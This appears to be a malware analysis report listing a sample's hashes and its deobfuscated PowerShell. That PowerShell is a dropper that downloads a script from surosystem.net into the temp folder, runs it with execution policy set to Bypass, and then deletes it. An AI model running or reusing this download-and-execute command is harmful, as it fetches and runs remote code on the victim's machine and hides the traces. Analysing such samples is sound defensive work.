|
Hash | Hash Value |
|---|---|
| MD5 | 6ee5e18357dfdd5934b9ba7600d6e62b
|
| Sha1 | 47bf842fd83ef47714fe3786b8b471ec12e5fb88
|
| Sha256 | 84f41ea0816b650a5311de96281f2921e6e13c41f2d6d0528367362cad986f4d
|
| Sha384 | 7dd435c336fc2e446ff1b811702871a09195e9377de855a9c9fdea0dd2578ef9f10fcc8448a4560b2bd122ebd7432609
|
| Sha512 | 0f3bd8639b360dded7464b4d1817d47eb2c53d1df05ddd21dd2c4853dd5a103b929c008a51bd4ee42965ba64dfa89f73cf6cff45689c6355305e762a93e3cceb
|
| SSDeep | 3:pFAzXbJJFIShsTY7CM8beSEetmAOBbAVWLczhYJC1Ke0GgEfVv+GabM7pJwJJFIN:pFw98SAYV8bNEFcOzelfVib4J88wu
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $f = "%temp%\s.ps1" $wc = New-Object "Net.WebClient" $wc."Headers"."Add"("User-Agent", "PowerShell") $wc."DownloadFile"("https://surosystem.net", $f) powershell -EP "Bypass" -File $f Remove-Item $f |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -File $f Remove-Item $f |
| Deobfuscated PowerShell | $f |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $f = "%temp%\s.ps1" $wc = New-Object "Net.WebClient" $wc."Headers"."Add"("User-Agent", "PowerShell") $wc."DownloadFile"("https://surosystem.net", $f) powershell -EP "Bypass" -File $f Remove-Item $f Malicious |
6ee5e18357dfdd5934b9ba7600d6e62b > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "Bypass" -File $f Remove-Item $f Malicious |
6ee5e18357dfdd5934b9ba7600d6e62b > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | $f Malicious |
6ee5e18357dfdd5934b9ba7600d6e62b > [PowerShell Command] > [PowerShell Command] |